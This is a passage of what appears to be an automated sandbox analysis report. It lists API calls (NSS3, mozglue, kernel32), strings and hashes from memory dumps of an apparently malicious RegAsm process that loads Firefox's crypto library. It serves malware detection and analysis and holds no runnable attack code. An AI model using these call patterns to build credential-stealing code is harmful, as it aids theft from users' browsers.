                                                                                                          • Part of subcall function 6C1C9270: free.MOZGLUE(?,?,6C1D3B70,?,?,?,?,?,6C1D5089,6C1CF39B,00000000), ref: 6C1C9286
                                                                                                          • Part of subcall function 6C1C9270: PL_HashTableDestroy.NSS3(?,6C1D3B70,?,?,?,?,?,6C1D5089,6C1CF39B,00000000), ref: 6C1C9292
                                                                                                          • Part of subcall function 6C1C8B50: TlsGetValue.KERNEL32(00000000,?,6C1D0948,00000000), ref: 6C1C8B6B
                                                                                                          • Part of subcall function 6C1C8B50: EnterCriticalSection.KERNEL32(?,?,?,6C1D0948,00000000), ref: 6C1C8B80
                                                                                                          • Part of subcall function 6C1C8B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C1D0948,00000000), ref: 6C1C8B8F
                                                                                                          • Part of subcall function 6C1C8B50: PR_Unlock.NSS3(?,?,?,?,6C1D0948,00000000), ref: 6C1C8BA1
                                                                                                          • Part of subcall function 6C1C8B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C1D0948,00000000), ref: 6C1C8BAC
                                                                                                          • Part of subcall function 6C1C8B50: free.MOZGLUE(?,?,?,?,?,6C1D0948,00000000), ref: 6C1C8BB8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
                                                                                                        • String ID:
                                                                                                        • API String ID: 3225375108-0
                                                                                                        • Opcode ID: b42e9718eda366a768f80406bb59d098a7e56fe7b36bed0b9214c791247bb46d
                                                                                                        • Instruction ID: 15da8bb8195d65c7b08db4f444516e8bfb29d305a8570211281371671eb540d6
                                                                                                        • Opcode Fuzzy Hash: b42e9718eda366a768f80406bb59d098a7e56fe7b36bed0b9214c791247bb46d
                                                                                                        • Instruction Fuzzy Hash: 792139B5A04A158FDB00BF78C088569BBF4FF15314F024969ECD597B00E734E899CB92
                                                                                                        APIs
                                                                                                        • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C1D0710), ref: 6C1C8FF1
                                                                                                        • PR_CallOnce.NSS3(6C312158,6C1C9150,00000000,?,?,?,6C1C9138,?,6C1D0710), ref: 6C1C9029
                                                                                                        • calloc.MOZGLUE(00000001,00000000,?,?,6C1D0710), ref: 6C1C904D
                                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C1D0710), ref: 6C1C9066
                                                                                                        • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C1D0710), ref: 6C1C9078
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1176783091-0
                                                                                                        • Opcode ID: 3677830891aa24cc2b0b24e39f7353069e918d15abd46fc494492d5a1d140310
                                                                                                        • Instruction ID: 27a9ba4cb2b9af22767a55d2eda2f2ff7957c5d61578e73e83b38889995162ee
                                                                                                        • Opcode Fuzzy Hash: 3677830891aa24cc2b0b24e39f7353069e918d15abd46fc494492d5a1d140310
                                                                                                        • Instruction Fuzzy Hash: 131144717001115BEB201AA9AC55A6A76ACEBA27ACF100131FC88C6F41F31BCD7583F7
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C1F1E10: TlsGetValue.KERNEL32 ref: 6C1F1E36
                                                                                                          • Part of subcall function 6C1F1E10: EnterCriticalSection.KERNEL32(?,?,?,6C1CB1EE,2404110F,?,?), ref: 6C1F1E4B
                                                                                                          • Part of subcall function 6C1F1E10: PR_Unlock.NSS3 ref: 6C1F1E76
                                                                                                        • free.MOZGLUE(?,6C1DD079,00000000,00000001), ref: 6C1DCDA5
                                                                                                        • PK11_FreeSymKey.NSS3(?,6C1DD079,00000000,00000001), ref: 6C1DCDB6
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C1DD079,00000000,00000001), ref: 6C1DCDCF
                                                                                                        • DeleteCriticalSection.KERNEL32(?,6C1DD079,00000000,00000001), ref: 6C1DCDE2
                                                                                                        • free.MOZGLUE(?), ref: 6C1DCDE9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1720798025-0
                                                                                                        • Opcode ID: 6d1ae78ab87df1f2f8f18d67f4fe2201c63345bbfe5ac2e1eba696d51370edc2
                                                                                                        • Instruction ID: 654899fda47af5b1a2430b82fea59f5519b440f82259b76268369b10a2d53d2e
                                                                                                        • Opcode Fuzzy Hash: 6d1ae78ab87df1f2f8f18d67f4fe2201c63345bbfe5ac2e1eba696d51370edc2
                                                                                                        • Instruction Fuzzy Hash: 9611CEB2B01616ABDB00AE69EC45E97B77CFF142687110532E91987E01E732F434CBE2
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C245B40: PR_GetIdentitiesLayer.NSS3 ref: 6C245B56
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C242CEC
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242D02
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242D1F
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242D42
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242D5B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1593528140-0
                                                                                                        • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                        • Instruction ID: a4cfc603d96670a409cc75aac32b71abbae7c52cfbb55809bc327171c94ee2d8
                                                                                                        • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                        • Instruction Fuzzy Hash: 7D01A1F5A10308ABE6319E26FC44A87B7B5EB55718F008525EC5AC6720E632E82586A2
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C245B40: PR_GetIdentitiesLayer.NSS3 ref: 6C245B56
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C242D9C
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242DB2
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242DCF
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242DF2
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242E0B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1593528140-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C1C3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C1DAE42), ref: 6C1C30AA
                                                                                                          • Part of subcall function 6C1C3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1C30C7
                                                                                                          • Part of subcall function 6C1C3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C1C30E5
                                                                                                          • Part of subcall function 6C1C3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1C3116
                                                                                                          • Part of subcall function 6C1C3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C1C312B
                                                                                                          • Part of subcall function 6C1C3090: PK11_DestroyObject.NSS3(?,?), ref: 6C1C3154
                                                                                                          • Part of subcall function 6C1C3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1C317E
                                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C1B99FF,?,?,?,?,?,?,?,?,?,6C1B2D6B,?), ref: 6C1DAE67
                                                                                                        • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C1B99FF,?,?,?,?,?,?,?,?,?,6C1B2D6B,?), ref: 6C1DAE7E
                                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C1B2D6B,?,?,00000000), ref: 6C1DAE89
                                                                                                        • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C1B2D6B,?,?,00000000), ref: 6C1DAE96
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C1B2D6B,?,?), ref: 6C1DAEA3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 754562246-0
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,6C2C0C83), ref: 6C2C094F
                                                                                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C2C0C83), ref: 6C2C0974
                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0983
                                                                                                        • _PR_MD_UNLOCK.NSS3(?,?,6C2C0C83), ref: 6C2C099F
                                                                                                        • OutputDebugStringA.KERNEL32(?,?,6C2C0C83), ref: 6C2C09B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1872382454-0
                                                                                                        APIs
                                                                                                        • DeleteCriticalSection.KERNEL32(6C2CA6D8), ref: 6C2CAE0D
                                                                                                        • free.MOZGLUE(?), ref: 6C2CAE14
                                                                                                        • DeleteCriticalSection.KERNEL32(6C2CA6D8), ref: 6C2CAE36
                                                                                                        • free.MOZGLUE(?), ref: 6C2CAE3D
                                                                                                        • free.MOZGLUE(00000000,00000000,?,?,6C2CA6D8), ref: 6C2CAE47
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$CriticalDeleteSection
                                                                                                        • String ID:
                                                                                                        • API String ID: 682657753-0
                                                                                                        APIs
                                                                                                        • __getptd.LIBCMT ref: 00426725
                                                                                                          • Part of subcall function 00424954: __getptd_noexit.LIBCMT ref: 00424957
                                                                                                          • Part of subcall function 00424954: __amsg_exit.LIBCMT ref: 00424964
                                                                                                        • __getptd.LIBCMT ref: 0042673C
                                                                                                        • __amsg_exit.LIBCMT ref: 0042674A
                                                                                                        • __lock.LIBCMT ref: 0042675A
                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0042676E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 938513278-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C0CCBE8: GetCurrentProcess.KERNEL32(?,6C0931A7), ref: 6C0CCBF1
                                                                                                          • Part of subcall function 6C0CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0931A7), ref: 6C0CCBFA
                                                                                                        • EnterCriticalSection.KERNEL32(6C11E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0CD1C5), ref: 6C0BD4F2
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0CD1C5), ref: 6C0BD50B
                                                                                                          • Part of subcall function 6C09CFE0: EnterCriticalSection.KERNEL32(6C11E784), ref: 6C09CFF6
                                                                                                          • Part of subcall function 6C09CFE0: LeaveCriticalSection.KERNEL32(6C11E784), ref: 6C09D026
                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0CD1C5), ref: 6C0BD52E
                                                                                                        • EnterCriticalSection.KERNEL32(6C11E7DC), ref: 6C0BD690
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0CD1C5), ref: 6C0BD751
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                        • String ID: MOZ_CRASH()
                                                                                                        • API String ID: 3805649505-2608361144
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C094290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C0D3EBD,6C0D3EBD,00000000), ref: 6C0942A9
                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C0EB127), ref: 6C0EB463
                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0EB4C9
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C0EB4E4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _getpidstrlenstrncmptolower
                                                                                                        • String ID: pid:
                                                                                                        • API String ID: 1720406129-3403741246
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0041009A
                                                                                                          • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
                                                                                                          • Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
                                                                                                          • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00410139
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0041014D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                        • String ID: vector<T> too long
                                                                                                        • API String ID: 2448322171-3788999226
                                                                                                        • Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
                                                                                                        • Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
                                                                                                        • Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
                                                                                                        • Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C146D36
                                                                                                        Strings
                                                                                                        • database corruption, xrefs: 6C146D2A
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C146D2F
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C146D20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 632333372-598938438
                                                                                                        • Opcode ID: 3d4efa1ebb5724d9c2559b3950374d7669c980d63324b87fb943220700abf5e7
                                                                                                        • Instruction ID: 71c078d43ee8a655055ac27534b5d8d795f55e07112e5924cac5904d5e034259
                                                                                                        • Opcode Fuzzy Hash: 3d4efa1ebb5724d9c2559b3950374d7669c980d63324b87fb943220700abf5e7
                                                                                                        • Instruction Fuzzy Hash: CA21E0706003099BC710CF2AD841B9AB7E2AF8431CF24852DD88A9BF51E371E9498B92
                                                                                                        APIs
                                                                                                        • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+"l,6C2232C2,<+"l,00000000,00000000,?), ref: 6C222FDA
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C22300B
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C22302A
                                                                                                          • Part of subcall function 6C210840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C2108B4
                                                                                                          • Part of subcall function 6C1FC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C1FC45D
                                                                                                          • Part of subcall function 6C1FC3D0: TlsGetValue.KERNEL32 ref: 6C1FC494
                                                                                                          • Part of subcall function 6C1FC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C1FC4A9
                                                                                                          • Part of subcall function 6C1FC3D0: PR_Unlock.NSS3(?), ref: 6C1FC4F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                        • String ID: <+"l
                                                                                                        • API String ID: 2538134263-1276598871
                                                                                                        • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                        • Instruction ID: b8a6eb85774c7502f5c3e7772b416b50464d65b2e543eea01278fa04431e7e02
                                                                                                        • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                        • Instruction Fuzzy Hash: AD11C4B6B0010C6BDB008E659C00B9BB7D9AB84668F184134FD1CD7780EB76EA15C7A1
                                                                                                        APIs
                                                                                                        • strtok_s.MSVCRT ref: 004133AF
                                                                                                        • StrCmpCA.SHLWAPI(00000000,004367E0,?), ref: 004133E8
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                        • strtok_s.MSVCRT ref: 00413424
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: strtok_s$lstrcpylstrlen
                                                                                                        • String ID: "xA
                                                                                                        • API String ID: 348468850-582338916
                                                                                                        • Opcode ID: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
                                                                                                        • Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
                                                                                                        • Opcode Fuzzy Hash: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
                                                                                                        • Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C27CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C27CC7B), ref: 6C27CD7A
                                                                                                          • Part of subcall function 6C27CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C27CD8E
                                                                                                          • Part of subcall function 6C27CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C27CDA5
                                                                                                          • Part of subcall function 6C27CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C27CDB8
                                                                                                        • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C27CCB5
                                                                                                        • memcpy.VCRUNTIME140(6C3114F4,6C3102AC,00000090), ref: 6C27CCD3
                                                                                                        • memcpy.VCRUNTIME140(6C311588,6C3102AC,00000090), ref: 6C27CD2B
                                                                                                          • Part of subcall function 6C199AC0: socket.WSOCK32(?,00000017,6C1999BE), ref: 6C199AE6
                                                                                                          • Part of subcall function 6C199AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C1999BE), ref: 6C199AFC
                                                                                                          • Part of subcall function 6C1A0590: closesocket.WSOCK32(6C199A8F,?,?,6C199A8F,00000000), ref: 6C1A0597
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                        • String ID: Ipv6_to_Ipv4 layer
                                                                                                        • API String ID: 1231378898-412307543
                                                                                                        • Opcode ID: 0c525c1715b21b8c81c9e0d3864812548da09d1addda63a06bb40905c113166e
                                                                                                        • Instruction ID: 5579c7b724f00880ec91291037edf4878b740fe7fa8e9321f26ed524c330182d
                                                                                                        • Opcode Fuzzy Hash: 0c525c1715b21b8c81c9e0d3864812548da09d1addda63a06bb40905c113166e
                                                                                                        • Instruction Fuzzy Hash: B511D6F5B002489EDB509F6E8C477C2BABCA366718F002229E906DBF41EB71C4048BD7
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C26A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C28C3A2,?,?,00000000,00000000), ref: 6C26A528
                                                                                                          • Part of subcall function 6C26A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C26A6E0
